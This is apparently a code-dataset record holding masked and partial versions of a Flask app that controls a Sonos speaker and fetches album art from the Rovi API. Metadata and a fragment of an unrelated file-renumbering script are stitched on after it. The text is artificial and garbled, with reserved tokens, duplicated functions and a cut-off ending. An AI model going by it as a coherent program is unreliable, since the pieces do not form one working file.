def current_track():
"""@brief get the current track information from Sonos """
track = sonos.get_current_track_info()
track['title'] = track['title'][:30]
track['artist'] = track['artist'][:30]
return track
@app.route('/play')
def play():
"""@brief the play function """
sonos.play()
return 'Ok'
@app.route('/pause')
def pause():
"""@brief the pause function """
sonos.pause()
return 'Ok'
@app.route('/following')
def following():
"""@brief the following function """
sonos.next()
return 'Ok'
@app.route('/previous')
def previous():
"""@brief the previous function """
sonos.previous()
return 'Ok'
@app.route('/volume')
def volume():
"""@brief get the actual volume """
vol = sonos.volume
return vol
@app.route('/volume_up')
def volume_up():
"""@brief the volume up function """
sonos.set_relative_volume(10)
return 'Ok'
@app.route('/volume_down')
def volume_down():
"""@brief the volume down function """
sonos.set_relative_volume(-10)
return 'Ok'
@app.route('/volume_mute')
def volume_mute():
"""@brief the mute function """
sonos.mute = True
return 'Ok'
@app.route('/volume_unmute')
def volume_unmute():
"""@brief the unmute function """
sonos.mute = False
return 'Ok'
@app.route('/track_01')
def track_01():
"""@brief switch to new track """
sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=
'FM4.ORF.AT', force_radio=True)
return 'Ok'
@app.route('/track_02')
def track_02():
"""@brief switch to new track """
sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',
title='Radio PSR Live', force_radio=True)
return 'Ok'
@app.route('/track_03')
def track_03():
"""@brief switch to new track """
sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen',
force_radio=True)
return 'Ok'
@app.route('/track_04')
def track_04():
"""@brief switch to new track """
sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=
'Sunshine Live', force_radio=True)
return 'Ok'
@app.route('/info-light')
def info_light():
"""@brief the info-light function """
track = current_track()
return json.dumps(track)
@app.route('/info')
def info():
"""@brief the info function """
track = current_track()
track['image'] = get_track_image(track['artist'], track['album'])
transport = sonos.get_current_transport_info()
track['playing'] = transport['current_transport_state'] != 'STOPPED'
track['mute'] = sonos.mute
return json.dumps(track)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app.config.from_pyfile('settings.py')
<|reserved_special_token_0|>
def gen_sig():
"""@brief return the MD5 checksum """
return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[
'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')
).hexdigest()
def get_track_image(artist, album):
"""@brief get the track image from Rovi """
blank_image = url_for('static', filename='img/blank.jpg')
if 'ROVI_SHARED_SECRET' not in app.config:
return blank_image
if 'ROVI_API_KEY' not in app.config:
return blank_image
headers = {'Accept-Encoding': 'gzip'}
req = requests.get(
'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +
app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +
album + '&performername=' + artist + '&include=images&size=1',
headers=headers, timeout=30)
if req.status_code != requests.codes.ok:
return blank_image
result = json.loads(req.content)
try:
return result['matchResponse']['results'][0]['album']['images'][0][
'front'][3]['url']
except (KeyError, IndexError):
return blank_image
def current_track():
"""@brief get the current track information from Sonos """
track = sonos.get_current_track_info()
track['title'] = track['title'][:30]
track['artist'] = track['artist'][:30]
return track
@app.route('/play')
def play():
"""@brief the play function """
sonos.play()
return 'Ok'
@app.route('/pause')
def pause():
"""@brief the pause function """
sonos.pause()
return 'Ok'
@app.route('/following')
def following():
"""@brief the following function """
sonos.next()
return 'Ok'
@app.route('/previous')
def previous():
"""@brief the previous function """
sonos.previous()
return 'Ok'
@app.route('/volume')
def volume():
"""@brief get the actual volume """
vol = sonos.volume
return vol
@app.route('/volume_up')
def volume_up():
"""@brief the volume up function """
sonos.set_relative_volume(10)
return 'Ok'
@app.route('/volume_down')
def volume_down():
"""@brief the volume down function """
sonos.set_relative_volume(-10)
return 'Ok'
@app.route('/volume_mute')
def volume_mute():
"""@brief the mute function """
sonos.mute = True
return 'Ok'
@app.route('/volume_unmute')
def volume_unmute():
"""@brief the unmute function """
sonos.mute = False
return 'Ok'
@app.route('/track_01')
def track_01():
"""@brief switch to new track """
sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=
'FM4.ORF.AT', force_radio=True)
return 'Ok'
@app.route('/track_02')
def track_02():
"""@brief switch to new track """
sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',
title='Radio PSR Live', force_radio=True)
return 'Ok'
@app.route('/track_03')
def track_03():
"""@brief switch to new track """
sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen',
force_radio=True)
return 'Ok'
@app.route('/track_04')
def track_04():
"""@brief switch to new track """
sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=
'Sunshine Live', force_radio=True)
return 'Ok'
@app.route('/info-light')
def info_light():
"""@brief the info-light function """
track = current_track()
return json.dumps(track)
@app.route('/info')
def info():
"""@brief the info function """
track = current_track()
track['image'] = get_track_image(track['artist'], track['album'])
transport = sonos.get_current_transport_info()
track['playing'] = transport['current_transport_state'] != 'STOPPED'
track['mute'] = sonos.mute
return json.dumps(track)
@app.route('/')
@app.route('/index')
def index():
"""@brief the index function """
track = current_track()
track['image'] = get_track_image(track['artist'], track['album'])
return render_template('index.html', track=track)
<|reserved_special_token_1|>
"""@brief the routes for Flask application
"""
import hashlib
import json
import time
import requests
from flask import render_template, url_for
from soco import SoCo
from app import app
app.config.from_pyfile("settings.py")
sonos = SoCo(app.config["SPEAKER_IP"])
def gen_sig():
"""@brief return the MD5 checksum """
return hashlib.md5(
(
app.config["ROVI_API_KEY"]
+ app.config["ROVI_SHARED_SECRET"]
+ repr(int(time.time()))
).encode("utf-8")
).hexdigest()
def get_track_image(artist, album):
"""@brief get the track image from Rovi """
blank_image = url_for("static", filename="img/blank.jpg")
if "ROVI_SHARED_SECRET" not in app.config:
return blank_image
if "ROVI_API_KEY" not in app.config:
return blank_image
headers = {"Accept-Encoding": "gzip"}
req = requests.get(
"http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey="
+ app.config["ROVI_API_KEY"]
+ "&sig="
+ gen_sig()
+ "&name= "
+ album
+ "&performername="
+ artist
+ "&include=images&size=1",
headers=headers,
timeout=30,
)
if req.status_code != requests.codes.ok:
return blank_image
result = json.loads(req.content)
try:
return result["matchResponse"]["results"][0]["album"]["images"][0]["front"][3]["url"]
except (KeyError, IndexError):
return blank_image
def current_track():
"""@brief get the current track information from Sonos """
track = sonos.get_current_track_info()
track["title"] = track["title"][:30]
track["artist"] = track["artist"][:30]
return track
@app.route("/play")
def play():
"""@brief the play function """
sonos.play()
return "Ok"
@app.route("/pause")
def pause():
"""@brief the pause function """
sonos.pause()
return "Ok"
@app.route("/following")
def following():
"""@brief the following function """
sonos.next()
return "Ok"
@app.route("/previous")
def previous():
"""@brief the previous function """
sonos.previous()
return "Ok"
@app.route("/volume")
def volume():
"""@brief get the actual volume """
vol = sonos.volume
return vol
@app.route("/volume_up")
def volume_up():
"""@brief the volume up function """
sonos.set_relative_volume(10)
return "Ok"
@app.route("/volume_down")
def volume_down():
"""@brief the volume down function """
sonos.set_relative_volume(-10)
return "Ok"
@app.route("/volume_mute")
def volume_mute():
"""@brief the mute function """
sonos.mute = True
return "Ok"
@app.route("/volume_unmute")
def volume_unmute():
"""@brief the unmute function """
sonos.mute = False
return "Ok"
@app.route("/track_01")
def track_01():
"""@brief switch to new track """
sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title='FM4.ORF.AT', force_radio=True)
return "Ok"
@app.route("/track_02")
def track_02():
"""@brief switch to new track """
sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer', title='Radio PSR Live', force_radio=True)
return "Ok"
@app.route("/track_03")
def track_03():
"""@brief switch to new track """
sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen', force_radio=True)
return "Ok"
@app.route("/track_04")
def track_04():
"""@brief switch to new track """
sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title='Sunshine Live', force_radio=True)
return "Ok"
@app.route("/info-light")
def info_light():
"""@brief the info-light function """
track = current_track()
return json.dumps(track)
@app.route("/info")
def info():
"""@brief the info function """
track = current_track()
track["image"] = get_track_image(track["artist"], track["album"])
transport = sonos.get_current_transport_info()
track["playing"] = transport["current_transport_state"] != "STOPPED"
track["mute"] = sonos.mute
return json.dumps(track)
@app.route("/")
@app.route('/index')
def index():
"""@brief the index function """
track = current_track()
track["image"] = get_track_image(track["artist"], track["album"])
return render_template("index.html", track=track)
|
flexible
|
{
"blob_id": "86f33895e9ae0e026d7d6e40e611796b2dc2c713",
"index": 8394,
"step-1": "<mask token>\n\n\ndef gen_sig():\n \"\"\"@brief return the MD5 checksum \"\"\"\n return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[\n 'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')\n ).hexdigest()\n\n\ndef get_track_image(artist, album):\n \"\"\"@brief get the track image from Rovi \"\"\"\n blank_image = url_for('static', filename='img/blank.jpg')\n if 'ROVI_SHARED_SECRET' not in app.config:\n return blank_image\n if 'ROVI_API_KEY' not in app.config:\n return blank_image\n headers = {'Accept-Encoding': 'gzip'}\n req = requests.get(\n 'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +\n app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +\n album + '&performername=' + artist + '&include=images&size=1',\n headers=headers, timeout=30)\n if req.status_code != requests.codes.ok:\n return blank_image\n result = json.loads(req.content)\n try:\n return result['matchResponse']['results'][0]['album']['images'][0][\n 'front'][3]['url']\n except (KeyError, IndexError):\n return blank_image\n\n\ndef current_track():\n \"\"\"@brief get the current track information from Sonos \"\"\"\n track = sonos.get_current_track_info()\n track['title'] = track['title'][:30]\n track['artist'] = track['artist'][:30]\n return track\n\n\n@app.route('/play')\ndef play():\n \"\"\"@brief the play function \"\"\"\n sonos.play()\n return 'Ok'\n\n\n@app.route('/pause')\ndef pause():\n \"\"\"@brief the pause function \"\"\"\n sonos.pause()\n return 'Ok'\n\n\n@app.route('/following')\ndef following():\n \"\"\"@brief the following function \"\"\"\n sonos.next()\n return 'Ok'\n\n\n@app.route('/previous')\ndef previous():\n \"\"\"@brief the previous function \"\"\"\n sonos.previous()\n return 'Ok'\n\n\n@app.route('/volume')\ndef volume():\n \"\"\"@brief get the actual volume \"\"\"\n vol = sonos.volume\n return vol\n\n\n@app.route('/volume_up')\ndef volume_up():\n \"\"\"@brief the volume up function \"\"\"\n sonos.set_relative_volume(10)\n 
return 'Ok'\n\n\n@app.route('/volume_down')\ndef volume_down():\n \"\"\"@brief the volume down function \"\"\"\n sonos.set_relative_volume(-10)\n return 'Ok'\n\n\n@app.route('/volume_mute')\ndef volume_mute():\n \"\"\"@brief the mute function \"\"\"\n sonos.mute = True\n return 'Ok'\n\n\n@app.route('/volume_unmute')\ndef volume_unmute():\n \"\"\"@brief the unmute function \"\"\"\n sonos.mute = False\n return 'Ok'\n\n\n<mask token>\n\n\n@app.route('/track_02')\ndef track_02():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',\n title='Radio PSR Live', force_radio=True)\n return 'Ok'\n\n\n<mask token>\n\n\n@app.route('/track_04')\ndef track_04():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=\n 'Sunshine Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/info-light')\ndef info_light():\n \"\"\"@brief the info-light function \"\"\"\n track = current_track()\n return json.dumps(track)\n\n\n@app.route('/info')\ndef info():\n \"\"\"@brief the info function \"\"\"\n track = current_track()\n track['image'] = get_track_image(track['artist'], track['album'])\n transport = sonos.get_current_transport_info()\n track['playing'] = transport['current_transport_state'] != 'STOPPED'\n track['mute'] = sonos.mute\n return json.dumps(track)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gen_sig():\n \"\"\"@brief return the MD5 checksum \"\"\"\n return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[\n 'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')\n ).hexdigest()\n\n\ndef get_track_image(artist, album):\n \"\"\"@brief get the track image from Rovi \"\"\"\n blank_image = url_for('static', filename='img/blank.jpg')\n if 'ROVI_SHARED_SECRET' not in app.config:\n return blank_image\n if 'ROVI_API_KEY' not in app.config:\n return blank_image\n headers = {'Accept-Encoding': 'gzip'}\n req = requests.get(\n 'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +\n app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +\n album + '&performername=' + artist + '&include=images&size=1',\n headers=headers, timeout=30)\n if req.status_code != requests.codes.ok:\n return blank_image\n result = json.loads(req.content)\n try:\n return result['matchResponse']['results'][0]['album']['images'][0][\n 'front'][3]['url']\n except (KeyError, IndexError):\n return blank_image\n\n\ndef current_track():\n \"\"\"@brief get the current track information from Sonos \"\"\"\n track = sonos.get_current_track_info()\n track['title'] = track['title'][:30]\n track['artist'] = track['artist'][:30]\n return track\n\n\n@app.route('/play')\ndef play():\n \"\"\"@brief the play function \"\"\"\n sonos.play()\n return 'Ok'\n\n\n@app.route('/pause')\ndef pause():\n \"\"\"@brief the pause function \"\"\"\n sonos.pause()\n return 'Ok'\n\n\n@app.route('/following')\ndef following():\n \"\"\"@brief the following function \"\"\"\n sonos.next()\n return 'Ok'\n\n\n@app.route('/previous')\ndef previous():\n \"\"\"@brief the previous function \"\"\"\n sonos.previous()\n return 'Ok'\n\n\n@app.route('/volume')\ndef volume():\n \"\"\"@brief get the actual volume \"\"\"\n vol = sonos.volume\n return vol\n\n\n@app.route('/volume_up')\ndef volume_up():\n \"\"\"@brief the volume up function \"\"\"\n sonos.set_relative_volume(10)\n 
return 'Ok'\n\n\n@app.route('/volume_down')\ndef volume_down():\n \"\"\"@brief the volume down function \"\"\"\n sonos.set_relative_volume(-10)\n return 'Ok'\n\n\n@app.route('/volume_mute')\ndef volume_mute():\n \"\"\"@brief the mute function \"\"\"\n sonos.mute = True\n return 'Ok'\n\n\n@app.route('/volume_unmute')\ndef volume_unmute():\n \"\"\"@brief the unmute function \"\"\"\n sonos.mute = False\n return 'Ok'\n\n\n@app.route('/track_01')\ndef track_01():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=\n 'FM4.ORF.AT', force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_02')\ndef track_02():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',\n title='Radio PSR Live', force_radio=True)\n return 'Ok'\n\n\n<mask token>\n\n\n@app.route('/track_04')\ndef track_04():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=\n 'Sunshine Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/info-light')\ndef info_light():\n \"\"\"@brief the info-light function \"\"\"\n track = current_track()\n return json.dumps(track)\n\n\n@app.route('/info')\ndef info():\n \"\"\"@brief the info function \"\"\"\n track = current_track()\n track['image'] = get_track_image(track['artist'], track['album'])\n transport = sonos.get_current_transport_info()\n track['playing'] = transport['current_transport_state'] != 'STOPPED'\n track['mute'] = sonos.mute\n return json.dumps(track)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef gen_sig():\n \"\"\"@brief return the MD5 checksum \"\"\"\n return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[\n 'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')\n ).hexdigest()\n\n\ndef get_track_image(artist, album):\n \"\"\"@brief get the track image from Rovi \"\"\"\n blank_image = url_for('static', filename='img/blank.jpg')\n if 'ROVI_SHARED_SECRET' not in app.config:\n return blank_image\n if 'ROVI_API_KEY' not in app.config:\n return blank_image\n headers = {'Accept-Encoding': 'gzip'}\n req = requests.get(\n 'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +\n app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +\n album + '&performername=' + artist + '&include=images&size=1',\n headers=headers, timeout=30)\n if req.status_code != requests.codes.ok:\n return blank_image\n result = json.loads(req.content)\n try:\n return result['matchResponse']['results'][0]['album']['images'][0][\n 'front'][3]['url']\n except (KeyError, IndexError):\n return blank_image\n\n\ndef current_track():\n \"\"\"@brief get the current track information from Sonos \"\"\"\n track = sonos.get_current_track_info()\n track['title'] = track['title'][:30]\n track['artist'] = track['artist'][:30]\n return track\n\n\n@app.route('/play')\ndef play():\n \"\"\"@brief the play function \"\"\"\n sonos.play()\n return 'Ok'\n\n\n@app.route('/pause')\ndef pause():\n \"\"\"@brief the pause function \"\"\"\n sonos.pause()\n return 'Ok'\n\n\n@app.route('/following')\ndef following():\n \"\"\"@brief the following function \"\"\"\n sonos.next()\n return 'Ok'\n\n\n@app.route('/previous')\ndef previous():\n \"\"\"@brief the previous function \"\"\"\n sonos.previous()\n return 'Ok'\n\n\n@app.route('/volume')\ndef volume():\n \"\"\"@brief get the actual volume \"\"\"\n vol = sonos.volume\n return vol\n\n\n@app.route('/volume_up')\ndef volume_up():\n \"\"\"@brief the volume up function \"\"\"\n sonos.set_relative_volume(10)\n 
return 'Ok'\n\n\n@app.route('/volume_down')\ndef volume_down():\n \"\"\"@brief the volume down function \"\"\"\n sonos.set_relative_volume(-10)\n return 'Ok'\n\n\n@app.route('/volume_mute')\ndef volume_mute():\n \"\"\"@brief the mute function \"\"\"\n sonos.mute = True\n return 'Ok'\n\n\n@app.route('/volume_unmute')\ndef volume_unmute():\n \"\"\"@brief the unmute function \"\"\"\n sonos.mute = False\n return 'Ok'\n\n\n@app.route('/track_01')\ndef track_01():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=\n 'FM4.ORF.AT', force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_02')\ndef track_02():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',\n title='Radio PSR Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_03')\ndef track_03():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen',\n force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_04')\ndef track_04():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=\n 'Sunshine Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/info-light')\ndef info_light():\n \"\"\"@brief the info-light function \"\"\"\n track = current_track()\n return json.dumps(track)\n\n\n@app.route('/info')\ndef info():\n \"\"\"@brief the info function \"\"\"\n track = current_track()\n track['image'] = get_track_image(track['artist'], track['album'])\n transport = sonos.get_current_transport_info()\n track['playing'] = transport['current_transport_state'] != 'STOPPED'\n track['mute'] = sonos.mute\n return json.dumps(track)\n\n\n<mask token>\n",
"step-4": "<mask token>\napp.config.from_pyfile('settings.py')\n<mask token>\n\n\ndef gen_sig():\n \"\"\"@brief return the MD5 checksum \"\"\"\n return hashlib.md5((app.config['ROVI_API_KEY'] + app.config[\n 'ROVI_SHARED_SECRET'] + repr(int(time.time()))).encode('utf-8')\n ).hexdigest()\n\n\ndef get_track_image(artist, album):\n \"\"\"@brief get the track image from Rovi \"\"\"\n blank_image = url_for('static', filename='img/blank.jpg')\n if 'ROVI_SHARED_SECRET' not in app.config:\n return blank_image\n if 'ROVI_API_KEY' not in app.config:\n return blank_image\n headers = {'Accept-Encoding': 'gzip'}\n req = requests.get(\n 'http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=' +\n app.config['ROVI_API_KEY'] + '&sig=' + gen_sig() + '&name= ' +\n album + '&performername=' + artist + '&include=images&size=1',\n headers=headers, timeout=30)\n if req.status_code != requests.codes.ok:\n return blank_image\n result = json.loads(req.content)\n try:\n return result['matchResponse']['results'][0]['album']['images'][0][\n 'front'][3]['url']\n except (KeyError, IndexError):\n return blank_image\n\n\ndef current_track():\n \"\"\"@brief get the current track information from Sonos \"\"\"\n track = sonos.get_current_track_info()\n track['title'] = track['title'][:30]\n track['artist'] = track['artist'][:30]\n return track\n\n\n@app.route('/play')\ndef play():\n \"\"\"@brief the play function \"\"\"\n sonos.play()\n return 'Ok'\n\n\n@app.route('/pause')\ndef pause():\n \"\"\"@brief the pause function \"\"\"\n sonos.pause()\n return 'Ok'\n\n\n@app.route('/following')\ndef following():\n \"\"\"@brief the following function \"\"\"\n sonos.next()\n return 'Ok'\n\n\n@app.route('/previous')\ndef previous():\n \"\"\"@brief the previous function \"\"\"\n sonos.previous()\n return 'Ok'\n\n\n@app.route('/volume')\ndef volume():\n \"\"\"@brief get the actual volume \"\"\"\n vol = sonos.volume\n return vol\n\n\n@app.route('/volume_up')\ndef volume_up():\n \"\"\"@brief the volume 
up function \"\"\"\n sonos.set_relative_volume(10)\n return 'Ok'\n\n\n@app.route('/volume_down')\ndef volume_down():\n \"\"\"@brief the volume down function \"\"\"\n sonos.set_relative_volume(-10)\n return 'Ok'\n\n\n@app.route('/volume_mute')\ndef volume_mute():\n \"\"\"@brief the mute function \"\"\"\n sonos.mute = True\n return 'Ok'\n\n\n@app.route('/volume_unmute')\ndef volume_unmute():\n \"\"\"@brief the unmute function \"\"\"\n sonos.mute = False\n return 'Ok'\n\n\n@app.route('/track_01')\ndef track_01():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title=\n 'FM4.ORF.AT', force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_02')\ndef track_02():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer',\n title='Radio PSR Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_03')\ndef track_03():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen',\n force_radio=True)\n return 'Ok'\n\n\n@app.route('/track_04')\ndef track_04():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title=\n 'Sunshine Live', force_radio=True)\n return 'Ok'\n\n\n@app.route('/info-light')\ndef info_light():\n \"\"\"@brief the info-light function \"\"\"\n track = current_track()\n return json.dumps(track)\n\n\n@app.route('/info')\ndef info():\n \"\"\"@brief the info function \"\"\"\n track = current_track()\n track['image'] = get_track_image(track['artist'], track['album'])\n transport = sonos.get_current_transport_info()\n track['playing'] = transport['current_transport_state'] != 'STOPPED'\n track['mute'] = sonos.mute\n return json.dumps(track)\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n \"\"\"@brief the index function \"\"\"\n track = current_track()\n track['image'] = get_track_image(track['artist'], track['album'])\n return 
render_template('index.html', track=track)\n",
"step-5": "\"\"\"@brief the routes for Flask application\n\"\"\"\nimport hashlib\nimport json\nimport time\n\nimport requests\nfrom flask import render_template, url_for\nfrom soco import SoCo\nfrom app import app\n\napp.config.from_pyfile(\"settings.py\")\nsonos = SoCo(app.config[\"SPEAKER_IP\"])\n\n\ndef gen_sig():\n \"\"\"@brief return the MD5 checksum \"\"\"\n return hashlib.md5(\n (\n app.config[\"ROVI_API_KEY\"]\n + app.config[\"ROVI_SHARED_SECRET\"]\n + repr(int(time.time()))\n ).encode(\"utf-8\")\n ).hexdigest()\n\n\ndef get_track_image(artist, album):\n \"\"\"@brief get the track image from Rovi \"\"\"\n blank_image = url_for(\"static\", filename=\"img/blank.jpg\")\n if \"ROVI_SHARED_SECRET\" not in app.config:\n return blank_image\n if \"ROVI_API_KEY\" not in app.config:\n return blank_image\n\n headers = {\"Accept-Encoding\": \"gzip\"}\n req = requests.get(\n \"http://api.rovicorp.com/recognition/v2.1/music/match/album?apikey=\"\n + app.config[\"ROVI_API_KEY\"]\n + \"&sig=\"\n + gen_sig()\n + \"&name= \"\n + album\n + \"&performername=\"\n + artist\n + \"&include=images&size=1\",\n headers=headers,\n timeout=30,\n )\n\n if req.status_code != requests.codes.ok:\n return blank_image\n\n result = json.loads(req.content)\n try:\n return result[\"matchResponse\"][\"results\"][0][\"album\"][\"images\"][0][\"front\"][3][\"url\"]\n except (KeyError, IndexError):\n return blank_image\n\n\ndef current_track():\n \"\"\"@brief get the current track information from Sonos \"\"\"\n track = sonos.get_current_track_info()\n track[\"title\"] = track[\"title\"][:30]\n track[\"artist\"] = track[\"artist\"][:30]\n return track\n\n\n@app.route(\"/play\")\ndef play():\n \"\"\"@brief the play function \"\"\"\n sonos.play()\n return \"Ok\"\n\n\n@app.route(\"/pause\")\ndef pause():\n \"\"\"@brief the pause function \"\"\"\n sonos.pause()\n return \"Ok\"\n\n\n@app.route(\"/following\")\ndef following():\n \"\"\"@brief the following function \"\"\"\n sonos.next()\n return 
\"Ok\"\n\n\n@app.route(\"/previous\")\ndef previous():\n \"\"\"@brief the previous function \"\"\"\n sonos.previous()\n return \"Ok\"\n\n\n@app.route(\"/volume\")\ndef volume():\n \"\"\"@brief get the actual volume \"\"\"\n vol = sonos.volume\n return vol\n\n\n@app.route(\"/volume_up\")\ndef volume_up():\n \"\"\"@brief the volume up function \"\"\"\n sonos.set_relative_volume(10)\n return \"Ok\"\n\n\n@app.route(\"/volume_down\")\ndef volume_down():\n \"\"\"@brief the volume down function \"\"\"\n sonos.set_relative_volume(-10)\n return \"Ok\"\n\n\n@app.route(\"/volume_mute\")\ndef volume_mute():\n \"\"\"@brief the mute function \"\"\"\n sonos.mute = True\n return \"Ok\"\n\n\n@app.route(\"/volume_unmute\")\ndef volume_unmute():\n \"\"\"@brief the unmute function \"\"\"\n sonos.mute = False\n return \"Ok\"\n\n\n@app.route(\"/track_01\")\ndef track_01():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://mp3stream1.apasf.apa.at:8000', title='FM4.ORF.AT', force_radio=True)\n return \"Ok\"\n\n\n@app.route(\"/track_02\")\ndef track_02():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://streams.radiopsr.de/psr-live/mp3-192/mediaplayer', title='Radio PSR Live', force_radio=True)\n return \"Ok\"\n\n\n@app.route(\"/track_03\")\ndef track_03():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen', force_radio=True)\n return \"Ok\"\n\n\n@app.route(\"/track_04\")\ndef track_04():\n \"\"\"@brief switch to new track \"\"\"\n sonos.play_uri('http://stream.sunshine-live.de/live/mp3-192', title='Sunshine Live', force_radio=True)\n return \"Ok\"\n\n\n@app.route(\"/info-light\")\ndef info_light():\n \"\"\"@brief the info-light function \"\"\"\n track = current_track()\n return json.dumps(track)\n\n\n@app.route(\"/info\")\ndef info():\n \"\"\"@brief the info function \"\"\"\n track = current_track()\n track[\"image\"] = get_track_image(track[\"artist\"], track[\"album\"])\n transport = 
sonos.get_current_transport_info()\n track[\"playing\"] = transport[\"current_transport_state\"] != \"STOPPED\"\n track[\"mute\"] = sonos.mute\n return json.dumps(track)\n\n\n@app.route(\"/\")\n@app.route('/index')\ndef index():\n \"\"\"@brief the index function \"\"\"\n track = current_track()\n track[\"image\"] = get_track_image(track[\"artist\"], track[\"album\"])\n return render_template(\"index.html\", track=track)\n",
"step-ids": [
16,
17,
18,
20,
23
]
}
|
[
16,
17,
18,
20,
23
] |
<|reserved_special_token_0|>
def create_test_file(filename):
with open(filename, 'w') as f:
f.write('foobar')
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser(description='Filling In The Gaps program')
parser.add_argument('-d', '--dir', help='Directory path.', dest=
'dir_path', required=True)
parser.add_argument('--file-prefix', required=True, help=
'File name prefix.')
parser.add_argument('-c', action='store_true', dest='create_tt', help=
'Create test tree.')
args = parser.parse_args()
if args.create_tt:
create_test_files(args.dir_path, args.file_prefix)
prev_num = 0
for filename in os.listdir(args.dir_path):
if re.match('{0}\\d{{3}}'.format(args.file_prefix), filename):
curr_num = int(filename.split(args.file_prefix)[1])
expected_num = prev_num + 1
if curr_num != expected_num:
old_path = os.path.join(args.dir_path, filename)
new_path = os.path.join(args.dir_path, '{}{:03d}'.format(
args.file_prefix, expected_num))
shutil.move(old_path, new_path)
curr_num = expected_num
prev_num = curr_num
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_test_file(filename):
with open(filename, 'w') as f:
f.write('foobar')
def create_test_files(test_dir, file_prefix):
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
os.mkdir(test_dir)
for i in range(1, 10):
if i in [2, 8]:
i += 1
testfile_path = os.path.join(test_dir, '{}{:03d}'.format(
file_prefix, i))
create_test_file(testfile_path)
def main():
parser = argparse.ArgumentParser(description='Filling In The Gaps program')
parser.add_argument('-d', '--dir', help='Directory path.', dest=
'dir_path', required=True)
parser.add_argument('--file-prefix', required=True, help=
'File name prefix.')
parser.add_argument('-c', action='store_true', dest='create_tt', help=
'Create test tree.')
args = parser.parse_args()
if args.create_tt:
create_test_files(args.dir_path, args.file_prefix)
prev_num = 0
for filename in os.listdir(args.dir_path):
if re.match('{0}\\d{{3}}'.format(args.file_prefix), filename):
curr_num = int(filename.split(args.file_prefix)[1])
expected_num = prev_num + 1
if curr_num != expected_num:
old_path = os.path.join(args.dir_path, filename)
new_path = os.path.join(args.dir_path, '{}{:03d}'.format(
args.file_prefix, expected_num))
shutil.move(old_path, new_path)
curr_num = expected_num
prev_num = curr_num
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_test_file(filename):
with open(filename, 'w') as f:
f.write('foobar')
def create_test_files(test_dir, file_prefix):
